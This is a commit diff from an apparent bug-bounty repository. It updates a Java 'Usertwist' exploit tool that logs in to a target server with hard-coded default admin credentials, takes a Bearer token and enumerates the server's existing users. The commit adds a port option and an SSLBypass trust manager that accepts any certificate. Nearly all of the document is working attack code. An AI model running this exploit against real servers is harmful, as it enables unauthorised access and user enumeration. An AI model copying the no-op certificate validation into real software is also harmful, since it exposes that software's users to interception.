Stage/bug-bounty-reports
4
0
Fork 0
Code Issues 3 Pull Requests Actions Packages Projects Releases 2 Wiki Activity

Added SSL verification bypass & port choice

Browse Source
This commit is contained in:
Mateo
2024-08-01 15:51:18 +02:00
parent 86495716e5
commit fb4c53fe36
3 changed files with 95 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

58
src/fr/motysten/usertwist/exploit/Main.java
View File

@@ -1,9 +1,14 @@
package fr.motysten.usertwist.exploit;
import fr.motysten.usertwist.exploit.tools.Cesar;
import fr.motysten.usertwist.exploit.tools.SSLBypass;
import org.json.JSONArray;
import org.json.JSONObject;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLException;
import javax.net.ssl.SSLHandshakeException;
import javax.net.ssl.TrustManager;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
@@ -11,16 +16,23 @@ import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
public class Main {
public static String link = "https://poc.athelas.fr";
public static String username = "admin";
public static String password = "AdminSecret1C";
public static String port = "443";
public static void main(String[] args) throws IOException, InterruptedException {
public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
SSLContext customContext = SSLContext.getInstance("TLS");
customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
System.out.println("Usertwist exploit by Motysten");
System.out.println("Please don't use for unethical purpose !\n");
String readLine;
@@ -29,6 +41,10 @@ public class Main {
readLine = reader.readLine();
if (!readLine.isEmpty()) {link = readLine;}
System.out.println("Please enter the port of the remote web server (leave empty to use default) :");
readLine = reader.readLine();
if (!readLine.isEmpty()) {port = readLine;}
System.out.println("Please enter the used username (leave empty to use default) :");
readLine = reader.readLine();
if (!readLine.isEmpty()) {username = readLine;}
@@ -45,14 +61,42 @@ public class Main {
System.out.println("Gathering Bearer token...");
HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.build();
HttpResponse<String> response = null;
HttpRequest request;
HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
boolean tokenFound = false;
while (!tokenFound) {
try {
request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/login"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.build();
response = client.send(request, HttpResponse.BodyHandlers.ofString());
tokenFound = true;
} catch (SSLHandshakeException e) {
System.err.println("Remote server certificate issuer couldn't be verified. Someone could be spying on your network.");
System.err.println("Would you like to continue anyway ? [y/N]");
if (!reader.readLine().equalsIgnoreCase("y")) {
System.err.println("Operation aborted ! Security failure.");
System.exit(1);
} else {
client = HttpClient.newBuilder().sslContext(customContext).build();
}
} catch (SSLException e) {
if (e.getMessage().contains("plaintext connection?")) {
System.err.println("Looks like you're trying to send an HTTPS request on HTTP port. Would you like to switch on port 443 ? [Y/n]");
if (reader.readLine().equalsIgnoreCase("n")) {
System.err.println("Operation aborted !");
System.exit(1);
} else {
port = "443";
}
}
}
}
if (response.statusCode() == 401) {
System.err.println("Invalid credentials ! Pleas try again (defaults credentials could help)");
System.err.println("Invalid credentials ! Please try again (defaults credentials could help)");
System.exit(1);
}
@@ -67,7 +111,7 @@ public class Main {
System.out.println("\nScanning for existing users...");
request = HttpRequest.newBuilder(URI.create(link + "/references"))
request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/references"))
.POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
.setHeader("Authorization", "Bearer " + token)
.build();

43
src/fr/motysten/usertwist/exploit/tools/SSLBypass.java Normal file
View File

@@ -0,0 +1,43 @@
package fr.motysten.usertwist.exploit.tools;
import javax.net.ssl.SSLEngine;
import javax.net.ssl.X509ExtendedTrustManager;
import java.net.Socket;
import java.security.cert.X509Certificate;
public class SSLBypass extends X509ExtendedTrustManager {
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
}
@Override
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
}
@Override
public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];
}
}